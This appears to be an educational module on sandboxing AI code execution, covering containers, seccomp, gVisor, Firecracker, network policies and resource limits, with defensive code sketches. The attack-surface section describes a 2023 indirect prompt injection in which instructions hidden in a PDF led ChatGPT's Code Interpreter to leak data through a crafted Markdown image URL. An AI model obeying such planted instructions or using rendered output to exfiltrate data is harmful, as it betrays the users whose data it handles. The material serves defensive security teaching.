How AI systems isolate code execution — containers, VMs, and the engineering decisions that keep millions of users safe.
OpenAI announced Code Interpreter as an alpha ChatGPT plugin in March 2023, rolled it out to all ChatGPT Plus users in July 2023, and later renamed it Advanced Data Analysis. The feature let users upload files such as CSVs and run Python directly in the chat. Security researchers, including Johann Rehberger, soon documented that the sandbox was stricter than it appeared: outbound network calls were blocked, the filesystem was ephemeral, and each session ran in an isolated container that was discarded after the session ended. The boundary was not accidental; it was a deliberate architectural decision made before a single user touched the feature.
OpenAI's engineering blog noted the team spent months on isolation guarantees before launch, because a single misconfigured sandbox allowing network egress could have enabled data exfiltration at massive scale. The architecture question — what a sandbox permits versus what it prevents — turned out to be the entire product's safety story.
A sandbox is an isolated execution environment where code runs with deliberately constrained access to host resources. The word comes from the idea of a physical sandbox: children play freely inside it, but sand stays inside the box. For AI code execution, the "sand" is the generated code, and the "box" is an environment engineered to prevent that code from affecting anything outside it.
Modern sandboxes used for AI code execution stack several layers of isolation. At the container layer, runtimes like Docker use Linux kernel namespaces to give each execution its own view of the process tree, network interfaces, and filesystem. Inside the container, seccomp (secure computing mode) filters restrict which system calls the process is allowed to invoke, blocking dangerous calls like ptrace and mount and restricting raw socket creation even if the code attempts them. Some implementations add a hypervisor layer beneath the container, running the container inside a lightweight VM (for example with Firecracker, AWS's open-source microVM technology) so that a container escape still lands inside a VM rather than on the host.
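The seccomp layer described above can be sketched as a small profile generator. This is a minimal illustration that emits the JSON layout Docker accepts for custom seccomp profiles. The helper name and the deny-list approach are assumptions made for brevity; production profiles are usually allowlists that deny by default.

```python
import json

# Syscalls named in the text above. Raw socket creation is not a separate
# syscall, so it is usually handled by dropping CAP_NET_RAW or by filtering
# the arguments of socket(); this sketch leaves it out.
BLOCKED_SYSCALLS = ["ptrace", "mount"]


def build_denylist_profile(blocked):
    """Return a Docker-style seccomp profile that allows everything except `blocked`."""
    return {
        "defaultAction": "SCMP_ACT_ALLOW",
        "syscalls": [
            {"names": sorted(blocked), "action": "SCMP_ACT_ERRNO"},
        ],
    }


profile = build_denylist_profile(BLOCKED_SYSCALLS)
print(json.dumps(profile, indent=2))
```

Saved to a file, a profile like this can be passed to a container with `docker run --security-opt seccomp=profile.json`. A blocked call then fails with an error code instead of reaching the kernel's implementation.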
Google's Colab, which powers Jupyter notebooks for tens of millions of users, uses a similar principle: each runtime is a separate VM allocated per user session, preventing cross-user interference. When your Colab session times out, the VM is destroyed — not paused, not saved, destroyed — ensuring no state persists between sessions unless you explicitly write to Google Drive.
A production AI code sandbox typically stacks: hypervisor (Firecracker/KVM) → container runtime (runc/gVisor) → seccomp filter → user-level process. Each layer independently enforces constraints, so a bypass at one layer hits the next.
Google open-sourced gVisor in 2018 as an alternative containment strategy. Rather than relying solely on Linux kernel namespaces, gVisor interposes a user-space kernel — called the Sentry — between the application and the host kernel. System calls from the sandboxed process are intercepted and handled by the Sentry, which reimplements a large subset of the Linux kernel API in Go. Only a small set of calls ever reach the actual host kernel.
The security argument is about attack surface: a sandboxed process that tries to exploit a kernel vulnerability reaches the Sentry's memory-safe Go implementation rather than the host kernel, so the amount of host kernel code an attacker can touch is vastly reduced. The cost is performance: gVisor adds overhead on system-call-intensive workloads, sometimes 2–3x for I/O-heavy operations. Google uses gVisor in Cloud Run and App Engine, accepting the performance trade-off in exchange for stronger multi-tenant isolation.
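The interception idea can be illustrated with a toy model. The class and handler names below are hypothetical and this is not how gVisor is implemented internally. It only shows the shape of the design: most calls are answered in user space, a small set is forwarded, and everything else is refused.

```python
# Hypothetical names throughout; this models the idea, not gVisor's real code.
HOST_PASSTHROUGH = {"read", "write"}   # small set forwarded to the host kernel


class ToySentry:
    def __init__(self):
        self.host_calls = []           # record of what reached the "host"
        self.handlers = {"getpid": lambda: 1, "uname": lambda: "toy-kernel"}

    def syscall(self, name, *args):
        if name in self.handlers:      # emulated entirely in user space
            return self.handlers[name](*args)
        if name in HOST_PASSTHROUGH:   # forwarded to the host
            self.host_calls.append(name)
            return 0
        raise PermissionError(f"{name} is not implemented by the sandbox kernel")


sentry = ToySentry()
print(sentry.syscall("getpid"), sentry.host_calls)
```

The `host_calls` list stays empty for emulated calls, which is the point of the design: a bug in an emulated call is a bug in the user-space kernel, not in the host.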
Firecracker, developed by Amazon for AWS Lambda and Fargate, takes a different approach: instead of intercepting syscalls in user space, it runs each workload inside a microVM backed by KVM hardware virtualization. Firecracker is designed to start guest user-space code in as little as 125 milliseconds, fast enough to be practical for serverless workloads. When Lambda executes your function, it runs inside a Firecracker microVM with its own guest kernel, not just a container. This is why Lambda functions from different customers cannot share memory even when they run on the same physical host.
gVisor intercepts syscalls in user space (strong isolation, higher syscall overhead). Firecracker uses hardware virtualization (near-native CPU performance, full VM boundary). OpenAI has not published the full design of ChatGPT's Code Interpreter sandbox; it is generally described as a container-based environment tuned specifically for Python data analysis workloads.
One of the most consequential sandbox design decisions is filesystem ephemerality. ChatGPT's Code Interpreter gives each session a writable working directory (observed at /mnt/data), but its contents vanish when the session expires. There is no persistent home directory. Files the agent creates, such as charts, processed CSVs, and intermediate model outputs, exist only for the session's duration unless the user explicitly downloads them.
This is a feature, not a limitation. An ephemeral filesystem means the sandbox starts clean every time, eliminating the risk of data from one user's session leaking into another's. It also prevents the accumulation of state that could be exploited across requests. The engineering tradeoff is that agents cannot build up persistent local knowledge between sessions without an external storage tool — which is precisely why capable AI agents integrate object storage (S3, GCS), databases, or dedicated memory tools as explicit external resources rather than relying on local disk.
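The lifecycle described above can be imitated on a single machine with a temporary directory. This is a small sketch, assuming a hypothetical `run_session` helper; a real sandbox discards the whole container or VM rather than one directory.

```python
import tempfile
from pathlib import Path


def run_session(task):
    """Run `task(workdir)` in a scratch directory that is deleted afterwards."""
    with tempfile.TemporaryDirectory(prefix="session-") as tmp:
        workdir = Path(tmp)
        result = task(workdir)
    # The directory and everything in it is gone at this point.
    return result, workdir


def make_chart(workdir):
    out = workdir / "chart.txt"
    out.write_text("pretend this is a PNG")
    return out.read_text()   # anything worth keeping must be returned or exported


result, old_dir = run_session(make_chart)
print(result, old_dir.exists())
```

The only data that survives the session is what the task explicitly returns, which mirrors the need for an explicit download or an external storage tool.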
Interrogate an AI about the engineering trade-offs between gVisor and Firecracker for a hypothetical multi-tenant code execution platform.
You are evaluating sandbox architectures for a platform that will execute AI-generated Python code on behalf of enterprise clients. Your AI advisor will help you think through the engineering decisions.
What sandboxes block, what they allow, and the documented incidents that revealed where those lines were drawn incorrectly.
In August 2023, security researcher Johann Rehberger published a proof-of-concept demonstrating prompt injection through a malicious PDF processed by ChatGPT's Code Interpreter. The injected instructions caused the model to exfiltrate data via a URL embedded in a rendered image. The sandbox's network blocks did not cover this channel because the outbound request was constructed as an image source in the chat UI, not a direct network call from the Python process. OpenAI subsequently added mitigations for the vector. The incident illustrated a fundamental principle: security boundaries in AI systems must account for all channels through which data can leave, not just the most obvious ones.
A code sandbox's attack surface is the set of all interfaces through which an attacker could cause unintended effects. For AI code execution environments, this surface is more complex than for traditional sandboxes because the code being executed is generated by a language model, which itself can be manipulated through the input data the code processes.
Rehberger's 2023 demonstration exposed what security engineers call an indirect prompt injection: malicious instructions embedded in data the AI processes (in that case, a PDF's metadata) that redirect the model's behavior. The sandbox correctly prevented the Python process from making direct outbound HTTP calls. But the model, influenced by injected instructions, constructed a Markdown image tag with a crafted URL. The browser rendering the chat interface then made the GET request — outside the sandbox entirely.
This category of attack — using the AI's own output rendering as an exfiltration channel — prompted OpenAI, Anthropic, and Google to implement additional output filtering, automatic URL sanitization in rendered content, and limits on what domains could be referenced in generated content. The fixes were not sandbox changes; they were model output policy changes.
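One form such output filtering can take is an allowlist applied to image URLs before rendering. The sketch below is an assumption about the general technique, not any vendor's actual filter. The host name is a placeholder, and a production renderer would sanitize the parsed document tree rather than rely on a regular expression.

```python
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"files.example.com"}   # hypothetical allowlist

# Matches Markdown images of the form ![alt](url) or ![alt](url "title").
IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)')


def sanitize_images(markdown):
    """Replace images whose host is not allowlisted with a text placeholder."""
    def replace(match):
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.scheme == "https" and parsed.hostname in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        return f"[image removed: {alt}]"
    return IMAGE_RE.sub(replace, markdown)


text = "![chart](https://files.example.com/a.png) ![x](https://attacker.example/log?d=secret)"
print(sanitize_images(text))
```

Because the browser never sees the untrusted URL, the GET request that would have carried the data is never made.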
The sandbox secures what the code process can do. It does not automatically secure what the model's output can cause when rendered. These are different threat models requiring different mitigations.
Most production AI code sandboxes implement one of three network policies: full block (no outbound connections), allowlist (only specific approved endpoints), or full access (unrestricted, used only in explicitly networked agent modes). ChatGPT's Advanced Data Analysis uses full block. Replit's Ghostwriter AI uses allowlist-based policy tied to the user's project configuration. Devin, Cognition AI's autonomous software engineer agent (released in 2024), operates with a browser and network access deliberately enabled — because the task of writing and deploying software inherently requires fetching packages, reading documentation, and running tests against live endpoints.
The choice between these policies is a function of the task, not a universal security stance. A data analysis sandbox needs no network access because all necessary data should already be uploaded. A software development agent needs network access because package managers, APIs, and deployment targets are inherently networked. The risk profiles differ by orders of magnitude: a networked agent can call external APIs, exfiltrate data, and interact with production systems.
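The three policies can be written down as a small decision function. This is an illustrative sketch with hypothetical names; real enforcement happens in firewall rules or an egress proxy outside the sandboxed process, not in Python code the sandbox could modify.

```python
from enum import Enum


class NetworkPolicy(Enum):
    FULL_BLOCK = "full_block"
    ALLOWLIST = "allowlist"
    FULL_ACCESS = "full_access"


def egress_allowed(policy, host, allowlist=frozenset()):
    """Decide whether an outbound connection to `host` is permitted."""
    if policy is NetworkPolicy.FULL_BLOCK:
        return False
    if policy is NetworkPolicy.ALLOWLIST:
        return host.lower() in allowlist
    return True  # FULL_ACCESS: rely on logging and approval gates instead


print(egress_allowed(NetworkPolicy.ALLOWLIST, "pypi.org", frozenset({"pypi.org"})))
```

Choosing the policy per task, as the text argues, amounts to passing a different `policy` value for a data analysis session than for a software development agent.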
Cognition published a transparency document in 2024 describing Devin's network access model. It runs inside a virtual machine with full internet access but with session recording, action logging, and explicit human approval gates before any deployment action. The security model is monitoring and approval rather than prevention — a fundamentally different philosophy from a locked-down data analysis sandbox.
Resource limits are often treated as performance management tools, but they are also security controls. CPU time limits prevent denial-of-service via infinite loops or computationally expensive operations designed to consume shared resources. Memory caps prevent a single session from exhausting host RAM in a multi-tenant environment. Process count limits prevent fork bombs — code that spawns processes exponentially until the host is overwhelmed.
Linux cgroups (control groups) implement these limits at the kernel level, and container runtimes expose them as configuration parameters. AWS Lambda enforces a hard 15-minute execution limit, a 10,240 MB (10 GB) memory cap, and a default quota of 1,000 concurrent executions per account per Region. Google Cloud Run enforces similar limits per container instance. ChatGPT's Code Interpreter enforces a per-cell execution timeout (observed at approximately 120 seconds) that prevents runaway computations from blocking the session indefinitely.
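A single-process approximation of these limits is available through POSIX resource limits. The sketch below assumes Linux and a hypothetical `run_limited` helper. It caps CPU time and address space for a child Python process, which is weaker than cgroups (it does not cover process counts or groups of processes) but shows the same principle.

```python
import resource
import subprocess
import sys


def _cap(kind, value):
    """Lower both soft and hard limits, never exceeding the current hard limit."""
    _, hard = resource.getrlimit(kind)
    if hard != resource.RLIM_INFINITY:
        value = min(value, hard)
    resource.setrlimit(kind, (value, value))


def run_limited(code, cpu_seconds=2, memory_bytes=1024 * 1024 * 1024, wall_timeout=10):
    """Run Python `code` in a child process with CPU-time and address-space caps."""
    def apply_limits():
        # Runs in the child just before exec; the limits carry over to the new program.
        _cap(resource.RLIMIT_CPU, cpu_seconds)
        _cap(resource.RLIMIT_AS, memory_bytes)

    return subprocess.run(
        [sys.executable, "-c", code],
        preexec_fn=apply_limits,
        capture_output=True,
        text=True,
        timeout=wall_timeout,
    )


print(run_limited("print(1 + 1)").stdout.strip())
```

A call such as `run_limited("while True: pass", cpu_seconds=1)` returns with a negative `returncode`, because the kernel terminates the child with a signal once its CPU budget is spent. The `wall_timeout` argument is a separate backstop for code that sleeps rather than spins.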
A less obvious resource limit is disk I/O throttling. Without it, a sandboxed process could write continuously to disk, consuming storage or causing I/O starvation that degrades performance for other tenants on the same host. Production platforms typically implement both IOPS limits (operations per second) and throughput limits (bytes per second) via the cgroup v1 blkio controller or the cgroup v2 io controller.
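Under cgroup v2, both kinds of limit are expressed as one line per block device in the group's `io.max` file. The helper below is a hypothetical formatter for that line, and the device numbers and limits are illustrative values. Actually writing the line requires root privileges and a cgroup with the io controller enabled.

```python
def io_max_line(major, minor, *, rbps=None, wbps=None, riops=None, wiops=None):
    """Format one line for a cgroup v2 `io.max` file; omitted keys stay unlimited."""
    limits = {"rbps": rbps, "wbps": wbps, "riops": riops, "wiops": wiops}
    parts = [f"{key}={value}" for key, value in limits.items() if value is not None]
    if not parts:
        raise ValueError("at least one limit is required")
    return f"{major}:{minor} " + " ".join(parts)


# Cap writes on device 8:0 at 10 MiB/s and 500 operations per second.
print(io_max_line(8, 0, wbps=10 * 1024 * 1024, wiops=500))
# 8:0 wbps=10485760 wiops=500
```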
Resource limits (CPU, memory, process count, disk I/O, network bandwidth) serve double duty as both performance controls and denial-of-service mitigations. A sandbox without resource limits is not truly secure even if its network policy is strict.
Work through the threat model for an AI agent that processes untrusted documents — where are the real security boundaries?
Your team is deploying an AI agent that accepts PDF uploads from untrusted sources, extracts data, and runs Python analysis. Think through the security boundaries with your AI advisor.
What sandboxed AI code runners can genuinely do — and the engineering boundaries that define where their power ends.
In October 2024, Anthropic released Claude's computer use capability in public beta. The system allows Claude to control a virtual desktop (moving a mouse, clicking, typing) within a sandboxed environment. Anthropic's documentation explicitly warned users not to give Claude access to sensitive data or accounts during beta, not because the sandbox could be broken, but because the model itself might take unintended actions. The capability worked; the constraint was on what you gave that capability access to. The lesson was stark: sandbox security and model capability scope are two different problems. A perfectly secure sandbox containing a fully capable agent with access to production systems is still dangerous.
Within their permitted boundaries, modern AI code execution sandboxes are genuinely powerful. ChatGPT's Advanced Data Analysis runs a full CPython interpreter with a large pre-installed library set including NumPy, pandas, matplotlib, scikit-learn, PIL, and dozens of others. It can perform complex numerical computation, train small machine learning models, process images, parse documents, generate visualizations, and execute multi-step data pipelines — all within a single session.
The computational resources available are non-trivial. Observed benchmarks suggest the Code Interpreter environment provides approximately 2 CPU cores and 4–8 GB of RAM per session. This is sufficient to train a scikit-learn gradient boosting model on datasets with millions of rows, run FAISS vector similarity search, or perform FFT analysis on large time series. Tasks that would once require a dedicated data engineering environment can now be accomplished conversationally.
E2B (a startup that provides sandboxed code execution as an API, used by companies building on top of models from Anthropic, OpenAI, and others) publishes its sandbox specifications publicly. Their standard Python sandbox provides 2 vCPUs, 512 MB RAM, and a 5-gigabyte ephemeral disk, with sessions lasting up to 24 hours. This is a different capability profile from ChatGPT's — more persistent, more storage, but less RAM — reflecting their target use case of long-running agentic tasks.
The real limit is not what the sandbox permits computationally — it's what data and external systems the sandbox has been given access to. A capable sandbox with no external data access is powerful but bounded. The same sandbox with database credentials and API keys is a fundamentally different risk surface.
The hard limits of sandboxed execution fall into several categories. First, there are computational limits enforced by cgroups: you cannot exceed allocated CPU or memory, and attempts to do so result in OOM (out of memory) kills or CPU throttling. Second, there are network limits: in full-block configurations, socket operations typically fail with a connection refused, network unreachable, or permission denied error, or simply time out. From inside the sandbox, the code often cannot distinguish a firewall block from a server being down.
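What the sandboxed code can observe is easy to check with a connection probe. The `probe` helper below is a hypothetical name. It reports only the exception type, which is all the information the calling code receives about why a connection failed.

```python
import socket


def probe(host, port, timeout=2.0):
    """Try a TCP connection and report what the calling code can observe."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "connected"
    except OSError as exc:   # refused, unreachable, timed out, DNS failure, ...
        return type(exc).__name__


print(probe("127.0.0.1", 9, timeout=1.0))
```

Whether the failure came from a firewall rule or from a server that is not listening, the code sees an `OSError` subclass and nothing more, so generated code should treat network failures in a sandbox as a possible policy decision rather than a transient fault to retry.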
Third, there are filesystem limits. Code running in ChatGPT's Code Interpreter cannot access the files of other users, cannot write to system directories, and cannot execute binaries that are not already present in the environment. Attempts to pip install packages will fail with an error when network access is blocked. This means the available library set is fixed at environment provisioning time, a significant constraint for specialized domains.
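Because the library set is fixed, generated code can check what is importable before committing to an approach. This is a minimal sketch using the standard library; `available_modules` and the last module name in the example are hypothetical.

```python
import importlib.util


def available_modules(names):
    """Map each top-level module name to whether it can be imported here."""
    return {name: importlib.util.find_spec(name) is not None for name in names}


print(available_modules(["json", "numpy", "some_niche_domain_lib"]))
```

An agent that runs this first can fall back to a pure-Python approach, or tell the user the task needs a different environment, instead of failing partway through on an import error.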
Fourth, there are model-layer limits that are separate from sandbox limits. Even if the sandbox technically permits an operation, the model may refuse to generate code that performs it. Anthropic's Claude will refuse to write functional malware even if the sandbox would permit executing it. This is a model policy constraint, not a sandbox constraint — an important distinction because model policies can be updated independently of sandbox architecture.
One notable absence in most AI code sandboxes is GPU access. ChatGPT's Code Interpreter runs on CPU only. This is not a security decision — GPUs can be virtualized and sandboxed effectively using NVIDIA's vGPU technology or AMD's equivalent. It is an economics decision: GPU instances cost 10–100x more than CPU instances, and providing GPU access to every user session would be prohibitively expensive at scale.
The practical consequence is that sandboxed AI code execution is suitable for data analysis, statistical modeling, and inference with pre-trained models loaded in CPU mode, but not for training deep learning models. A user trying to fine-tune a transformer model in ChatGPT's sandbox will hit computation time limits before meaningful training occurs. Google Colab addresses this by offering GPU runtimes, with idle timeouts and maximum session lengths (up to about 12 hours on the free tier, longer on some paid tiers) enforced to manage GPU allocation.
For AI agents in production that need GPU inference, the standard pattern is to call an external inference API (OpenAI, Anthropic, Replicate, Together AI) from within the sandbox, rather than running GPU workloads locally. The sandbox becomes an orchestration layer, and the GPU compute happens outside it — with all the security implications that external API calls entail.
Sandboxed code + external inference API = the dominant production pattern for AI agents needing ML capabilities. The sandbox handles data processing and orchestration; external APIs handle GPU-dependent inference. This separates the security boundary problem from the compute resource problem.
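The pattern can be sketched with the inference call injected as a function. All names here are hypothetical, and `fake_infer` stands in for a real HTTPS call to a provider. The design choice worth noting is that only an aggregate summary crosses the sandbox boundary, not the raw rows.

```python
from statistics import mean


def summarize_locally(rows):
    """Data processing that stays inside the sandbox."""
    values = [row["amount"] for row in rows]
    return {"count": len(values), "mean": mean(values), "max": max(values)}


def analyze(rows, infer):
    """Send only the aggregate summary, not the raw rows, to the external model."""
    summary = summarize_locally(rows)
    prompt = f"Explain these statistics in one sentence: {summary}"
    return infer(prompt)


def fake_infer(prompt):
    # Stand-in for a real call to an external inference API.
    return f"(model reply to {len(prompt)} chars)"


rows = [{"amount": 10}, {"amount": 30}]
print(analyze(rows, fake_infer))
```

Passing `infer` as a parameter keeps the network dependency explicit, so the same orchestration code runs under a full-block policy with a stub and under an allowlist policy with a real client.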
Design the capability envelope for a production AI data analysis agent — what do you enable, what do you restrict, and why?
Your organization wants to deploy an AI agent that analyzes financial data from internal databases. You need to define what the agent's sandbox can and cannot do.
Lesson 4 covers integration patterns: the key principles, real-world applications, and implications for practitioners working in this domain.
Understanding this topic requires both theoretical grounding and practical awareness of how these concepts manifest in deployed systems. The frameworks covered in earlier lessons provide the foundation; this lesson connects them to implementation reality.
The transition from theory to practice reveals challenges that pure conceptual frameworks don't capture. Real-world deployment introduces constraints, trade-offs, and edge cases that demand nuanced judgment rather than rigid rule-following.
Effective practitioners in this space develop the ability to reason across multiple frameworks simultaneously, recognizing when different perspectives apply and how to resolve conflicts between competing priorities.
As this field continues to evolve, the principles covered in this module will remain foundational even as specific technologies and implementations change. The ability to think critically about these topics — rather than simply memorizing current best practices — is what separates effective practitioners from those who merely follow checklists.